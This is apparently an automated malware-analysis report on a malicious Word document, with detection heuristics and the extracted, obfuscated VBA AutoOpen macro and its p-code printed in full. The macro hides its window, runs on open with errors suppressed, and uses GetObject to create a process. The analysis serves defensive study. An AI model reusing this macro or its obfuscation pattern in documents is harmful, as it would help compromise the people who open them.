MALICIOUS (Risk Score: 210)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample is a malicious Office document containing legacy WordBasic macro markers and a detected VBA AutoOpen macro. The heuristic firings indicate the use of GetObject, a common technique for executing arbitrary code. The ClamAV detection further confirms its malicious nature. The VBA script is heavily obfuscated, but the presence of AutoOpen and GetObject suggests an attempt to download and execute a secondary payload.
Heuristics (7)

- ClamAV: Doc.Malware.Dsau-6904244-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Dsau-6904244-0
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: `Set awcDAXDw = GetObject(ExAADAAB + sAxoAx.E4w_Ak + GZUAB1)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub autoopen()`
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13011 bytes |

SHA-256: baba40b12a1d5a456368db625ccb2e4fc25aec56cf5da013ca735dd868800d91

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ZDGQBc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "sAxoAx"
Attribute VB_Base = "0{B00C1D2A-0EC5-4834-BD52-55DCDDDB556B}{E8DB5D3B-4C2A-40DF-A84C-3A33A884B904}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "WDBBAQA"
Sub autoopen()
On Error Resume Next
If SGAQDA = O1U_A4G Then
XQBBXB = (354164903)
Rkxc1cAD = (uAXZcA_B * Log(185537904 + Atn(90458249 * ZUAAUw_)) + XBwAAA1c + CDbl(PAcGXA - Sqr(UUxABAoA / CBool(619123844 / 648437584) + GoAo_wc - Rnd(lXBQcwAZ))) * 717692923 * 140857080)
SD_A1A = (876277793)
End If
If joxXB_A = zw1kAo Then
ABCBXAAU = (907333972)
kDDwxZ = (Dw1A1U * Log(906077285 + Atn(939496631 * ABGwAUA)) + Z4DQCDAw + CDbl(wA4A4xA - Sqr(jA11_x / CBool(904290008 / 247771865) + Qc4AA4A - Rnd(TUwAkDZ))) * 104070901 * 407975498)
K1GQ4A = (208115342)
End If
If vAkDw4_ = YXAXAx Then
w1DAAAk = (911857544)
V_1AAA_ = (iQAwZUU * Log(699515691 + Atn(578272690 * fCwUAZQQ)) + A_AXDQQA + CDbl(lBAUAXAB - Sqr(jQAAA_ / CBool(234002449 / 875593952) + GG_BGDDx - Rnd(joUoAQAQ))) * 484803153 * 720327324)
WZX_1x = (386064342)
End If
Set awcDAXDw = GetObject(ExAADAAB + sAxoAx.E4w_Ak + GZUAB1)
If zDBAxA = i1AAAxAw Then
BB4ZcQ = (370313042)
wxABAAZ = (BoUABGQA * Log(312109724 + Atn(756444821 * wB_xAB)) + UAADAAB + CDbl(TBGwAXX - Sqr(NAABw4A / CBool(175736737 / 990808190) + s41xDA - Rnd(SAABBU))) * 930200640 * 173715715)
iD1AA4 = (573405040)
End If
If howAUx = tcBQA1 Then
JUD1Ux4A = (587887753)
rCU_ZB = (cUQG4AZZ * Log(697222529 + Atn(285234511 * EAAZADo)) + PBAAcCD + CDbl(EAC4BQU - Sqr(LAZoD1x / CBool(942634415 / 929334407) + KACAAAAA - Rnd(EAxXXUA))) * 480444825 * 68796775)
K4GBAU = (230801638)
End If
If KAxAGDA4 = LDXCAk Then
zkBAoGcA = (543619911)
vQABAB = (LZQA1AC_ * Log(55987397 + Atn(23136848 * YCA_AX)) + R1ABw_ + CDbl(uZADAwD - Sqr(UAQAwA / CBool(730719312 / 839687655) + z4BACZC - Rnd(iAZAA_BB))) * 984468410 * 611468616)
dcAAC4 = (239226092)
End If
awcDAXDw.ShowWindow = 711727 - 711727
If zQAwQXA = QBc4C_A Then
kADBAAA = (450440259)
nAwDBcU = (sAUwAw * Log(473041508 + Atn(688292563 * jAZoGAU)) + a1DD__ + CDbl(FQk4AAA - Sqr(OBA4AC4A / CBool(49112116 / 526349501) + bC_QQAc - Rnd(wQAoDAU))) * 20994649 * 425511610)
uQBQ_QU = (364955007)
End If
If XQQUAw = CUAwow Then
VAokkBw = (919364621)
OGCQDA = (wA_4ZDk * Log(6426374 + Atn(849015688 * TAA4QDA)) + u4QBBA + CDbl(NQAwwD1X - Sqr(GQxkcAZA / CBool(37212185 / 126409053) + WAxGAA4 - Rnd(tUDAAc))) * 179336256 * 152281553)
UD1QD1Q4 = (646481162)
End If
GetObject(wwcBBGA + sAxoAx.cDDAAAxB + HwQAD4UA). _
Create@ pACA_A + sAxoAx.NBwA1D + QcAAADBB + sAxoAx.Z4AkAkZ + pDAXUowA + sAxoAx.wkUQUBZA + YoB1D1_, QZAAAZAQ, awcDAXDw, WAwGAAA_
If wACxAUQ = HcBDQA Then
mGAU4Ac_ = (648909886)
sD4xBUAC = (a4ADAUk * Log(380977896 + Atn(920961872 * YAGCAA)) + wQZUCAA + CDbl(zUBcCAwD - Sqr(oxBDAxQ / CBool(388970675 / 942189567) + WG4AxD - Rnd(ZAGoAUwA))) * 60028052 * 537514096)
sAkQZA_ = (777214553)
End If
If IAxUDAB = nGBAGw Then
SAABAo4 = (613193940)
sXAAwUAo = (LAU4xC4w * Log(69644910 + Atn(179403780 * ZCCG1Ak)) + EAAACcD + CDbl(EQAQAwwA - Sqr(NUQAAA / CBool(682560908 / 94327741) + VAAx1AU - Rnd(DcAQwDQD))) * 958521476 * 626994569)
NDAAxQU = (677554219)
End If
If qZDDDA = I4D4cCA Then
sUo1CXAQ = (284786612)
QG4UoC = (lDwACQAo * Log(537229880 + Atn(964221077 * jXAZDoco)) + cQDUkZxG + CDbl(cDAAAQ - Sqr(KAUBAoQ / CBool(117643941 / 936060523) + wCQQBA - Rnd(LAABBww))) * 148071599 * 533879942)
sACZGcA = (967372682)
End If
End Sub
' Processing file: /tmp/qstore_tbwpkwd8
' ===============================================================================
' Module streams:
' Macros/VBA/ZDGQBc - 1104 bytes
' Macros/VBA/sAxoAx - 1154 bytes
' Macros/VBA/WDBBAQA - 6138 bytes
' Line #0:
' FuncDefn (Sub WDBBAQA())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld autoopen
' Ld SGAQDA
' Eq
' IfBlock
' Line #3:
' LitDI4 0x20A7 0x151C
' Paren
' St O1U_A4G
' Line #4:
' Ld Rkxc1cAD
' LitDI4 0x1570 0x0B0F
' LitDI4 0x4889 0x0564
' Ld uAXZcA_B
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld ZUAAUw_
' Add
' Ld XBwAAA1c
' Ld PAcGXA
' LitDI4 0x1484 0x24E7
' LitDI4 0x5F50 0x26A6
' Div
' Coerce (Bool)
' Div
' Ld UUxABAoA
' Add
' Ld GoAo_wc
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x1FFB 0x2AC7
' Mul
' LitDI4 0x4EF8 0x0865
' Mul
' Add
' Paren
' St XQBBXB
' Line #5:
' LitDI4 0xF021 0x343A
' Paren
' St lXBQcwAZ
' Line #6:
' EndIfBlock
' Line #7:
' Ld SD_A1A
' Ld joxXB_A
' Eq
' IfBlock
' Line #8:
' LitDI4 0xD154 0x3614
' Paren
' St zw1kAo
' Line #9:
' Ld kDDwxZ
' LitDI4 0xA465 0x3601
' LitDI4 0x94B7 0x37FF
' Ld Dw1A1U
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld ABGwAUA
' Add
' Ld Z4DQCDAw
' Ld wA4A4xA
' LitDI4 0x5ED8 0x35E6
' LitDI4 0xB2D9 0x0EC4
' Div
' Coerce (Bool)
' Div
' Ld jA11_x
' Add
' Ld Qc4AA4A
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0xFEF5 0x0633
' Mul
' LitDI4 0x364A 0x1851
' Mul
' Add
' Paren
' St ABCBXAAU
' Line #10:
' LitDI4 0x968E 0x0C67
' Paren
' St TUwAkDZ
' Line #11:
' EndIfBlock
' Line #12:
' Ld K1GQ4A
' Ld vAkDw4_
' Eq
' IfBlock
' Line #13:
' LitDI4 0xD788 0x3659
' Paren
' St YXAXAx
' Line #14:
' Ld V_1AAA_
' LitDI4 0xC32B 0x29B1
' LitDI4 0xBDB2 0x2277
' Ld iQAwZUU
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld fCwUAZQQ
' Add
' Ld A_AXDQQA
' Ld lBAUAXAB
' LitDI4 0x9811 0x0DF2
' LitDI4 0x80E0 0x3430
' Div
' Coerce (Bool)
' Div
' Ld jQAAA_
' Add
' Ld GG_BGDDx
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x8251 0x1CE5
' Mul
' LitDI4 0x529C 0x2AEF
' Mul
' Add
' Paren
' St w1DAAAk
' Line #15:
' LitDI4 0xDFD6 0x1702
' Paren
' St joUoAQAQ
' Line #16:
' EndIfBlock
' Line #17:
' SetStmt
' Ld GetObject
' Ld MSForms
' MemLd ExAADAAB
' Add
' Ld E4w_Ak
' Add
' ArgsLd awcDAXDw 0x0001
' Set WZX_1x
' Line #18:
' Ld GZUAB1
' Ld zDBAxA
' Eq
' IfBlock
' Line #19:
' LitDI4 0x8752 0x1612
' Paren
' St i1AAAxAw
' Line #20:
' Ld wxABAAZ
' LitDI4 0x6A9C 0x129A
' LitDI4 0x6E95 0x2D16
' Ld BoUABGQA
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld wB_xAB
' Add
' Ld UAADAAB
' Ld TBGwAXX
' LitDI4 0x87A1 0x0A79
' LitDI4 0x887E 0x3B0E
' Div
' Coerce (Bool)
' Div
' Ld NAABw4A
' Add
' Ld s41xDA
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0xBC40 0x3771
' Mul
' LitDI4 0xB103 0x0A5A
' Mul
' Add
' Paren
' St BB4ZcQ
' Line #21:
' LitDI4 0x7770 0x222D
' Paren
' St SAABBU
' Line #22:
' EndIfBlock
' Line #23:
' Ld iD1AA4
' Ld howAUx
' Eq
' IfBlock
' Line #24:
' LitDI4 0x7489 0x230A
' Paren
' St tcBQA1
' Line #25:
' Ld rCU_ZB
' LitDI4 0xC581 0x298E
' LitDI4 0x554F 0x1100
' Ld cUQG4AZZ
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld EAAZADo
' Add
' Ld PBAAcCD
' Ld EAC4BQU
' LitDI4 0x75AF 0x382F
' LitDI4 0x8487 0x3764
' Div
' Coerce (Bool)
' Div
' Ld LAZoD1x
' Add
' Ld KACAAAAA
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x0199 0x1CA3
' Mul
' LitDI4 0xC167 0x0419
' Mul
' Add
' Paren
' St JUD1Ux4A
' Line #26:
' LitDI4 0xC0E6 0x0DC1
' Paren
' St EAxXXUA
' Line #27:
' EndIfBlock
' Line #28:
' Ld K4GBAU
' Ld KAxAGDA4
' Eq
' IfBlock
' Line #29:
' LitDI4 0xFB47 0x2066
' Paren
' St LDXCAk
' Line #30:
' Ld vQABAB
' LitDI4 0x4CC5 0x0356
' LitDI4 0x0A50 0x0161
' Ld LZQA1AC_
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld YCA_AX
' Add
' Ld R1ABw_
' Ld uZADAwD
' LitDI4 0xE450 0x2B8D
' LitDI4 0x9DE7 0x320C
' Div
' Coerce (Bool)
' Div
' Ld UAQAwA
' Add
' Ld z4BACZC
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0xCBBA 0x3AAD
' Mul
' LitDI4 0x4548 0x2472
' Mul
' Add
' Paren
' St zkBAoGcA
' Line #31:
' LitDI4 0x4CEC 0x0E42
' Paren
' St iAZAA_BB
' Line #32:
' EndIfBlock
' Line #33:
' LitDI4 0xDC2F 0x000A
' LitDI4 0xDC2F 0x000A
' Sub
' Ld WZX_1x
' MemSt dcAAC4
' Line #34:
' Ld ShowWindow
' Ld zQAwQXA
' Eq
' IfBlock
' Line #35:
' LitDI4 0x2C43 0x1AD9
' Paren
' St QBc4C_A
' Line #36:
' Ld nAwDBcU
' LitDI4 0x0A64 0x1C32
' LitDI4 0x82D3 0x2906
' Ld sAUwAw
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld jAZoGAU
' Add
' Ld a1DD__
' Ld FQk4AAA
' LitDI4 0x6434 0x02ED
' LitDI4 0x74BD 0x1F5F
' Div
' Coerce (Bool)
' Div
' Ld OBA4AC4A
' Add
' Ld bC_QQAc
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x5A59 0x0140
' Mul
' LitDI4 0xCABA 0x195C
' Mul
' Add
' Paren
' St kADBAAA
' Line #37:
' LitDI4 0xC57F 0x15C0
' Paren
' St wQAoDAU
' Line #38:
' EndIfBlock
' Line #39:
' Ld uQBQ_QU
' Ld XQQUAw
' Eq
' IfBlock
' Line #40:
' LitDI4 0x640D 0x36CC
' Paren
' St CUAwow
' Line #41:
' Ld OGCQDA
' LitDI4 0x0F06 0x0062
' LitDI4 0xF388 0x329A
' Ld wA_4ZDk
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld TAA4QDA
' Add
' Ld u4QBBA
' Ld NQAwwD1X
' LitDI4 0xD019 0x0237
' LitDI4 0xD95D 0x0788
' Div
' Coerce (Bool)
' Div
' Ld GQxkcAZA
' Add
' Ld WAxGAA4
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x7440 0x0AB0
' Mul
' LitDI4 0xA1D1 0x0913
' Mul
' Add
' Paren
' St VAokkBw
' Line #42:
' LitDI4 0x850A 0x2688
' Paren
' St tUDAAc
' Line #43:
' EndIfBlock
' Line #44:
' LineCont 0x0004 0B 00 00 00
' Ld Create
' Ld MSForms
' MemLd pACA_A
' Add
' Ld NBwA1D
' Add
' Ld MSForms
' MemLd QcAAADBB
' Add
' Ld Z4AkAkZ
' Add
' Ld MSForms
' MemLd pDAXUowA
' Add
' Ld wkUQUBZA
' Add
' Ld YoB1D1_
' Ld WZX_1x
' Ld QZAAAZAQ
' Ld UD1QD1Q4
' Ld MSForms
' MemLd wwcBBGA
' Add
' Ld cDDAAAxB
' Add
' ArgsLd awcDAXDw 0x0001
' ArgsMemCall HwQAD4UA@ 0x0004
' Line #45:
' Ld WAwGAAA_
' Ld wACxAUQ
' Eq
' IfBlock
' Line #46:
' LitDI4 0x943E 0x26AD
' Paren
' St HcBDQA
' Line #47:
' Ld sD4xBUAC
' LitDI4 0x42E8 0x16B5
' LitDI4 0xC350 0x36E4
' Ld a4ADAUk
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld YAGCAA
' Add
' Ld wQZUCAA
' Ld zUBcCAwD
' LitDI4 0x38B3 0x172F
' LitDI4 0xABFF 0x3828
' Div
' Coerce (Bool)
' Div
' Ld oxBDAxQ
' Add
' Ld WG4AxD
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0xF494 0x0393
' Mul
' LitDI4 0xD070 0x2009
' Mul
' Add
' Paren
' St mGAU4Ac_
' Line #48:
' LitDI4 0x5A59 0x2E53
' Paren
' St ZAGoAUwA
' Line #49:
' EndIfBlock
' Line #50:
' Ld sAkQZA_
' Ld IAxUDAB
' Eq
' IfBlock
' Line #51:
' LitDI4 0x98D4 0x248C
' Paren
' St nGBAGw
' Line #52:
' Ld sXAAwUAo
' LitDI4 0xB26E 0x0426
' LitDI4 0x7C04 0x0AB1
' Ld LAU4xC4w
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld ZCCG1Ak
' Add
' Ld EAAACcD
' Ld EQAQAwwA
' LitDI4 0x0D8C 0x28AF
' LitDI4 0x53BD 0x059F
' Div
' Coerce (Bool)
' Div
' Ld NUQAAA
' Add
' Ld VAAx1AU
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0xE084 0x3921
' Mul
' LitDI4 0x2D89 0x255F
' Mul
' Add
' Paren
' St SAABAo4
' Line #53:
' LitDI4 0xA82B 0x2862
' Paren
' St DcAQwDQD
' Line #54:
' EndIfBlock
' Line #55:
' Ld NDAAxQU
' Ld qZDDDA
' Eq
' IfBlock
' Line #56:
' LitDI4 0x7FB4 0x10F9
' Paren
' St I4D4cCA
' Line #57:
' Ld QG4UoC
' LitDI4 0x7A38 0x2005
' LitDI4 0xD895 0x3978
' Ld lDwACQAo
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld jXAZDoco
' Add
' Ld cQDUkZxG
' Ld cDAAAQ
' LitDI4 0x1AA5 0x0703
' LitDI4 0x266B 0x37CB
' Div
' Coerce (Bool)
' Div
' Ld KAUBAoQ
' Add
' Ld wCQQBA
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x64AF 0x08D3
' Mul
' LitDI4 0x5C86 0x1FD2
' Mul
' Add
' Paren
' St sUo1CXAQ
' Line #58:
' LitDI4 0xEF8A 0x39A8
' Paren
' St LAABBww
' Line #59:
' EndIfBlock
' Line #60:
' EndSub
' Line #61: